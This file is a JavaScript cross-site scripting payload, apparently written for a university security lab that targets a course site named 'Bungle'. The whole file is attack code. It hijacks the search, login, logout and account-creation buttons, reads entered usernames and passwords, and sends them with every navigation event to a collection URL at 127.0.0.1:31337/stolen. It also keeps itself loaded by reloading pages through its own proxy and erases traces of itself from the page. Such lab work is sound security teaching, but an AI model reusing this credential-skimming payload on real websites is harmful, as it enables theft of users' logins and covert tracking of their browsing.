function payload(attacker){ var target = "http://bungle-cs461.cs.illinois

1. function payload(attacker)
2. {
3. var target = "http://bungle-cs461.cs.illinois.edu/";
4. function log(data)
5. {
6. console.log($.param(data))
7. $.get(attacker, data);
8. }
9. function constructEvent(type, url)
10. {
11. if(type == "i")
12. {
13. Username = $("#username").val();
14. Password = $("#userpass").val();
15. return {event:"login",user:Username,pass:Password};
16. }
17. else if(type == "o")
18. {
19. return {event:"logout",user:($("#logged-in-user").text())};
20. }
21. else if(type == "c")
22. {
23. Username = $("#username").val();
24. Password = $("#userpass").val();
25. return {event:"create_account",user:Username,pass:Password};
26. }
27. else
28. {
29. if($("#logged-in-user").text() != "")
30. {
31. return {event:"nav",user:String($("#logged-in-user").text()),url:url}
32. }
33. else
34. {
35. return {event:"nav",url:url};
36. }
37. }
38. }
39. function proxy(href,data)
40. {
41. if(data == "")
42. {
43. $("html").load(href, function(){
44. clearHistory();
45. $("html").show();
46. });
47. }
48. else
49. {
50. $("html").load(href, data, function(){
51. clearHistory();
52. $("html").show();
53. });
54. }
55. }
56. function hijackSearchButton(event)
57. {
58. event.preventDefault();
59. searchQuery = $("#query").val();
60. searchEvent = {event: "search",q:encodeURIComponent(searchQuery)}
61. log(constructEvent("","search?q="+searchQuery));
62. history.pushState({type: "search",url:target+"search?q="+encodeURIComponent(searchQuery)},"",target+"search?q="+encodeURIComponent(searchQuery));
63. reload("search?q="+encodeURIComponent(searchQuery), "");
64. }
65. function hijackLogOutButton(event)
66. {
67. event.preventDefault();
68. log(constructEvent("o",""));
69. history.pushState({type:"logout",url:target},"",target);
70. reload("logout",{});
71. }
72. function hijackLogInButton(event)
73. {
74. event.preventDefault();
75. Username = $("#username").val();
76. Password = $("#userpass").val();
77. log(constructEvent("i",""));
78. history.pushState({type:"logout",url:target},"",target);
79. reload("login",{username:Username,password:Password});
80. }
81. function hijackCreateAccountButton(event)
82. {
83. event.preventDefault();
84. Username = $("#username").val();
85. Password = $("#userpass").val();
86. log(constructEvent("c",""));
87. history.pushState({type:"logout",url:target},"",target);
88. reload("create",{username:Username,password:Password});
89. }
90. function hijackSearchAgainButton(event)
91. {
92. event.preventDefault();
93. log(constructEvent("","./"));
94. history.pushState({type: "again",url:target},"",target);
95. reload("./","");
96. }
97. function clearHistory()
98. {
99. $("a").filter(":contains(\"function\")").remove();
100. $("a").filter(":contains(\"String\")").remove();
101. }
102. function reload(newLink,data)
103. {
104. $("html").hide();
105. proxy(newLink,data);
106. }
107. history.replaceState({type: "home",url:target},"",target);
108. reload("./","");
109. log(constructEvent("","./"));
110. $(document).ready(function()
111. {
112. $(document).on("click","#search-btn",hijackSearchButton);
113. $(document).on("click","#log-out-btn",hijackLogOutButton);
114. $(document).on("click","#log-in-btn",hijackLogInButton);
115. $(document).on("click","#new-account-btn",hijackCreateAccountButton);
116. $(document).on("click","#search-again-btn",hijackSearchAgainButton);
117. });
118. window.onpopstate = function(event)
119. {
120. if(event.state.type == "search" || event.state.type == "home" || event.state.type == "logout" || event.state.type == "again")
121. {
122. reload(event.state.url,"");
123. }
124. else if(event.state.type == "login")
125. {
126. reload(event.state.url,{});
127. }
128. };
129. };payload("http://127.0.0.1:31337/stolen");